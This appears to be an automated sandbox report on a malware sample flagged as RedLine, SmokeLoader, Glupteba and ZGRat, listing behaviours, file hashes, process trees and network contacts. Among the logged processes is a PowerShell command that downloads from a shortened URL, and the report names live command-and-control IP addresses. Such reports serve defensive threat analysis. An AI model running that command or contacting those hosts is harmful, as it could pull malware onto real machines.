Analysis Overview
SHA256
bd13bca1138353850c1d0ebe674f2092d83ed95e2d83aaf7aeedd38ff3717d23
Threat Level: Known bad
The file 0x0031000000014721-451.dat was found to be: Known bad.
Malicious Activity Summary
ZGRat
RedLine
Detect ZGRat V1
Glupteba
Smokeloader family
RedLine payload
Glupteba payload
SmokeLoader
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Deletes itself
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Unsigned PE
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 18:37
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 18:37
Reported
2023-12-18 18:40
Platform
win7-20231215-en
Max time kernel
28s
Max time network
76s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe
"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"
C:\Users\Admin\AppData\Local\Temp\624C.exe
C:\Users\Admin\AppData\Local\Temp\624C.exe
C:\Users\Admin\AppData\Local\Temp\7698.exe
C:\Users\Admin\AppData\Local\Temp\7698.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp" /SL5="$9011E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\7DF8.exe
C:\Users\Admin\AppData\Local\Temp\7DF8.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| BG | 91.92.254.7:80 | tcp | |
| US | 64.185.227.156:80 | tcp |
Files
memory/3032-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3032-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1212-1-0x0000000002D90000-0x0000000002DA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\624C.exe
| MD5 | 1628c4ac16c9fd4e60d6eefcfd0ca1f2 |
| SHA1 | 362aec5a747ed3b99996fdc972cb51a72f818689 |
| SHA256 | 8df146244d8f1677c82c8a4414b504c3c9a329caf69218fd53c507b12f8da4d1 |
| SHA512 | afec20745144619d3b6e1581e77066f2426376b494545dde68c4c54c787d9f7df8e8c56bca56d1d12b317e7d131d41abd357004560df33a7a5249a07762358ba |
C:\Users\Admin\AppData\Local\Temp\624C.exe
| MD5 | a8c45021e6ee96ad127bf25eebbfedce |
| SHA1 | 5a103eba454730a01163f3d2428e2ce58ddf6168 |
| SHA256 | 7e894d180dbbad9f65b50616c1bc58187a0d9a24dc6b4f0e9b54a1f2500eff37 |
| SHA512 | 7744e358272aebc99fb923ed68b7a0ff454cc703e9d2490c11ad1d744f8856088cbf84b2eb236f89f0475804b241b8e5f401cad37be275183be245fc1494d2b1 |
memory/2084-14-0x0000000000160000-0x00000000001B2000-memory.dmp
memory/2084-19-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/2084-20-0x0000000004F50000-0x0000000004F90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7698.exe
| MD5 | b3eeb284533de706d1e39562e5942a79 |
| SHA1 | 8ec197e20c89179ce3678542d8ed07a0bac57db2 |
| SHA256 | 79dc01a0e266231b5506cc53471e1bfc3f55f5f822887bd8d816c6d35c2987a9 |
| SHA512 | 36cc734e7ff565f803001b055f4628303ff9498af6e266da71547602a112ba55a665b3257c1956c81c550503f913892acae074784d833d9b26d6a0bb7472c0a0 |
C:\Users\Admin\AppData\Local\Temp\7698.exe
| MD5 | 3306bb02d2aabd9a9bfe1e8aa818c928 |
| SHA1 | 0549c179379986e1da422068fba02c83e254203b |
| SHA256 | dace15ac43d36c47b1004b095735004aa3c49889150cfae6188310bbf847b923 |
| SHA512 | aebae65fda2f3e0436998fb74ca2817468e798ee061a6a514328ef67bb88c3cac6ead4857d4df5447982f401266e52b2b7e7ad725519412f728ce16b7f026298 |
memory/2772-27-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/2772-28-0x00000000003B0000-0x00000000011A2000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | ab888f57379c9057ec94a73a5d4349a5 |
| SHA1 | 3fec7dba1d5ea81db05750982cef21d29ce4fa1e |
| SHA256 | 204c59c9ed4cb80b17ec80a394f59759fe67994fb3e67ef88a763ff7362ecd05 |
| SHA512 | 1907056136e4143e6bd1e3c8a433b4789d276f8c5dd4279b19323be8cba647227aaf92c5f6a106724a006261ad6edc5ec305cc74a0765422549df200d278fe2c |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 174caa766705bbb082dfa30456d19f64 |
| SHA1 | 357925425b7f47e99703eecd2872f0f59049362f |
| SHA256 | d4b6605b07ac8e62fae56fbda1a8cf7a706fe6c839e0ea95aee1e52d69ca97d2 |
| SHA512 | edc7ff3bfc5bc6c9bfe4224e8fd8185e2b015240a2914193537ed2b1108867805dfc401c9c618c275603d1daf37dcdf22177e9a792eb6b209d665c5e8bfb75ec |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | a98f6155e05cdc4398d2b3d0365b5a28 |
| SHA1 | 8bc35073fde1405157a5343b7714fbed1b63188a |
| SHA256 | 47c421bad8acc2658e9d1c52995b50441b186aadc9137ac479df7c61169bb750 |
| SHA512 | e73c48f9c392b9ec7b965f67099392dae9ce77e88176d385bfed6bdf496b9dae4784ba186d3bae62f66588a4d3720ca68446014cc86f758275a1f6812288bad4 |
\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
memory/2016-58-0x0000000002680000-0x0000000002A78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 857aa3af511550939ad23672ca2b224e |
| SHA1 | ee9c9bf95ab211b984096067562bcbd0ca2c82d8 |
| SHA256 | 7e6df4f2a364f3e3c6b1a26a84a423f0f88c559f76053cd2694a93fae47e0fbf |
| SHA512 | e203093d98fcb4aa46ffa9201cbde37c786faa2ace76eec957bd01e3b3c79d22ab7149e7e0e54f8238da8205258cd5ea452db04a4d140edf033b3530d93f36ff |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9643eb2f7eda63e52e5a60ccd1aea256 |
| SHA1 | 29c45961f81e94335da5e46574039c64aad22131 |
| SHA256 | e7b364a898b373a029e41066f1a26f8269be239a0acea25e3626989b4931d683 |
| SHA512 | 332d2a6aa31e2bf08ebf49c6372c3fa17c7aca9918ba113b4eb51a49e198e4e632ef8379f1848738f5dfbd22659b4404f5000dac3e1e542760c169d15d3eca22 |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 46caf6b0b64506200e5ffd7041ce660f |
| SHA1 | 79c5657532c534b174c71f224655df47d3cbd919 |
| SHA256 | 333b469824d914c162ab3818260d1bd49de8119d6849b69df71cda88ca35a565 |
| SHA512 | bda2e364445fb4a446fda0b59e32b4a6bbce07c87b8bc11727551d5b3adf453586ab75b5350dd7b3c2cfd48f3a2cd9ad42de798e23dd15f4102f7ac1dade110a |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e44770a5b7f40d91cb4c08244a7a256c |
| SHA1 | 27ddf7042c48857f1e3d1ddcc767d3fd7c90f25e |
| SHA256 | 811b13ba8f0100d5edc178d46d9f02b9a99509694c13b5c762752f1e148d3c89 |
| SHA512 | d338448675725972d137bdd538e91879e0365eb31974a7b3fe62af70f12c629dd6c6e2ef3805d18ec123c2acb1dfe4e896b22c5f93cf2dda74b751afd8c1ef98 |
memory/2772-69-0x0000000074B80000-0x000000007526E000-memory.dmp
memory/1332-68-0x0000000000400000-0x0000000000418000-memory.dmp
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 30cd9f0f501e42d2b2c633d09b0add80 |
| SHA1 | 9e14624ff630dc3c97b9cbf7b7d680c70abcc1a5 |
| SHA256 | 2577d1c2e4f276f4e93fc4f4c26492a439adaa756028ab2490d5d4d5ddfd9e1a |
| SHA512 | 5a2a82039de2a3e7159a4b0de2965d4613c3b626274289f542926dd4f6fc0a90d6a1a9fc50810ed54161a22a0383c54eb2f57a5186dc6e24d160d42675b44717 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | bbef2475688a65343f8f453bad9d0395 |
| SHA1 | 8a0768b76b0f96e5029da243d7f6ae9e7b076ab4 |
| SHA256 | 63ea7a4254b4c816a1024713afbaef6487bdf13941740222b2ab34224d147e5b |
| SHA512 | b64aef5a53f12e1ae3ebf1ee960de0b4d5624af9696c8d597d59a658d85044cb457e3334fffbf29817d82e74c7475b2262469a39d83b488a40696bf2806a7078 |
memory/2016-71-0x0000000002680000-0x0000000002A78000-memory.dmp
memory/2016-73-0x0000000002A80000-0x000000000336B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | c104d059ac2795e96636c3215ce2275e |
| SHA1 | 201a2ac1a95d771320e6a8cf676004962fd26e75 |
| SHA256 | fe09443103ec4cbb314be81394f4634d4d8000efaa48714148431a3f90750906 |
| SHA512 | c58d56a7625eab84c11dcd82ddbb9e92941036469e0fad9dc08d95ab610fcc108f4bfd60ec1306cf8fd9e605092cf74918c64ac8a4570fe36fa72094136cb0d3 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 0a90f231fcfede6e071cfa5e88b244f7 |
| SHA1 | 161954936f6bef19c895d6798a9ebc1e36eb8d5f |
| SHA256 | 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e |
| SHA512 | 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 397bd9efec644db61e4764ba5cacb749 |
| SHA1 | dd586711e8f17e2f853360da174934d500b341f1 |
| SHA256 | 9a628170aaeb05856e58480ef9a7827ac1a2e1775b164fd3acb93b4a055c218e |
| SHA512 | 42fe49140ef7ff2fd67620c06a53b4b7c8a9c0a05206b566c0a9f342624d1a70dbe7c7ac518ade448bd91881d600ec0ec5d806c81e26720f6c9e4d1df01ecd74 |
memory/2016-87-0x0000000000400000-0x0000000000D1C000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2188-103-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2908-114-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
\Users\Admin\AppData\Local\Temp\is-GVFR0.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\??\c:\users\admin\appdata\local\temp\is-nlvck.tmp\tuc3.tmp
| MD5 | 0f512e7e71a73563a86f7da8ca8022a7 |
| SHA1 | b7eff07b2aac336e1d8f755f806005c22561ac86 |
| SHA256 | 628e8a1bf0c16e97d84ccc3309786a0f4d5aba46893825e12aee6c1c582c6d69 |
| SHA512 | 823db9dde7df4e5d4f4baff4facaa1be79412bf0a2acd3e9885507599c8a7a75728eda9fe4b90c000881b8a656428a6461b26e52d198de388d45e92cecd11319 |
C:\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
| MD5 | b3fae67141280b66be24d8e960b48263 |
| SHA1 | 4e18d90912568b09f4ae03006c80f4e591dd528b |
| SHA256 | ea2b9a05672b85405c86532abd8f1ad97f39020d02b094a0ebb6c7a4b2bf95c6 |
| SHA512 | 1f0b67c557e22f721b7bdd71343f900cb10a401df6be5a67a21f212c14e652e8a0a1afdb7c57a327b1cf5a464166c8d1c60d4fdf417acf71da863fb54b069545 |
\Users\Admin\AppData\Local\Temp\is-NLVCK.tmp\tuc3.tmp
| MD5 | 6045f66424564f5dba00cedb688e7fa7 |
| SHA1 | ad441a2c48880eaf398d4e1fe9409223b89265f6 |
| SHA256 | c410fa72fecadc8db0439a87014640853a152a5e5268528b80a7feadd919e21d |
| SHA512 | a4a6d3e9111596eb8dffff6c54ca9ad3fe91e49397319a2f26ed02440f185c7a96fba35bcd45ed05a679d250392d8a49999385aae65dd3248bb8583d65ecf497 |
\Users\Admin\AppData\Local\Temp\nsd77B0.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 48f3709376715226b10f39ca25a17b47 |
| SHA1 | 7d12464c646314f7d6530d1a485521dbecb176df |
| SHA256 | 01902b0ae74c0cb8b31fb8c3145eaed642704e4c82c8b7d63d873936dfd7f6b4 |
| SHA512 | 6ca7e610e4c1efda0514587aa3c49d3045b600d3a0d446c30fb767cfe3c3c0e47e147e47d61dc88102cb9a5551c02fa214c3bd578def42d4636566f1ac137bbd |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 18:37
Reported
2023-12-18 18:40
Platform
win10v2004-20231215-en
Max time kernel
43s
Max time network
84s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F4B0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\6C2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\F4B0.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe
"C:\Users\Admin\AppData\Local\Temp\0x0031000000014721-451.exe"
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
C:\Users\Admin\AppData\Local\Temp\6C2.exe
C:\Users\Admin\AppData\Local\Temp\6C2.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\412D.exe
C:\Users\Admin\AppData\Local\Temp\412D.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp" /SL5="$C002E,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\nsh63E8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\6ACF.exe
C:\Users\Admin\AppData\Local\Temp\6ACF.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 83.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.229.1:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.229.231.54.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
